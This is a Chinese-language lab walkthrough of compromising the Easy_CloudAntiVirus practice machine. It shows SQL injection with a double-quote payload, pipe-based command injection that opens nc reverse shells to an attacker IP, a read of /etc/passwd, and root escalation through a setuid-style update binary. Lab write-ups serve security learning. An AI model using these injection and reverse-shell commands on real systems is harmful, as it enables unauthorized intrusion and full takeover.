Easy_CloudAntiVirus靶机渗透过程

准备环境

攻击机:WSL-Kali-Linux

目标靶机:Easy_CloudAntiVirus

平台:VMware Workstation 16.2

靶机为NAT模式

一、信息搜集

1.主机嗅探

  • 在第一次启动靶机时,靶机并没有获取到IP,在虚拟机的启动界面,GRUB引导页按E键,在以linux开头的那行末尾加上rw signie init=/bin/bash,再Ctrl+X启动。进入系统之后手动更改网络配置即可

1

可得到靶机IP192.168.9.137

2.端口扫描

放进kali一把梭

nmap -A -p- 192.168.9.137

2

该靶机开放的端口情况如下

端口号服务
22OpenSSH
8080Httpd

3.目录扫描

先访问其web服务

3

是一个病毒检测扫描的网站服务,有一个输入邀请码的文本框,推断可能存在SQL注入

通过目录扫描,发现还存在console目录

8

访问console页面提示输入PIN

9

console页面先放一放

二、漏洞利用

1.SQL注入

先测试注入类型,当输入11'时,都回显

4

当输入1"时,回显数据库报错信息

5

根据报错信息,可以得知邀请码输入框的SQL语句为select * from code where password="' + password + '",由双引号("")来隔断,由此可以构造payload1" or 1=1 --+

6

2.反弹shell

进入到webscan目录,列出了当前目录下的存在文件,在输入框内输入hello可得到hello文件备扫描的结果

7

推测存在命令执行,执行语句应该是XXXX(病毒扫描命令) 文件名,可以通过管道符注入命令,查询是否存在nc

|which nc

10

存在nc,可以直接获取反弹shell,构造payload|nc 172.22.228.35 3333

11

拿到反弹shell之后,执行命令会等待一段时间,可尝试使用nc串联

|nc 172.22.228.35 3333|/bin/bash|nc 172.22.228.35 4444

12

3333端口执行命令,4444端口会显示回显

查看当前用户

whoami

得回显是scanner,查看该系统存在哪些用户

cat /etc/passwd

13

一共存在rootcloudavscanner这三个用户

/home/scanner下存在两个可疑文件

14

3.提权

存在update_cloudavupdate_cloudav.c文件,其中update_cloudav的所有者是root

通过查看update_cloudav文件内容,可以得知执行update_cloudav时需要在后面加命令

./update_cloudav "XXXX"

试着使用update_cloudav提权,建立nc

./update_cloudav "a|nc 172.22.228.35 5555|/bin/bash|nc 172.22.228.35 6666"

15

成功拿到root权限

目标靶机已完成渗透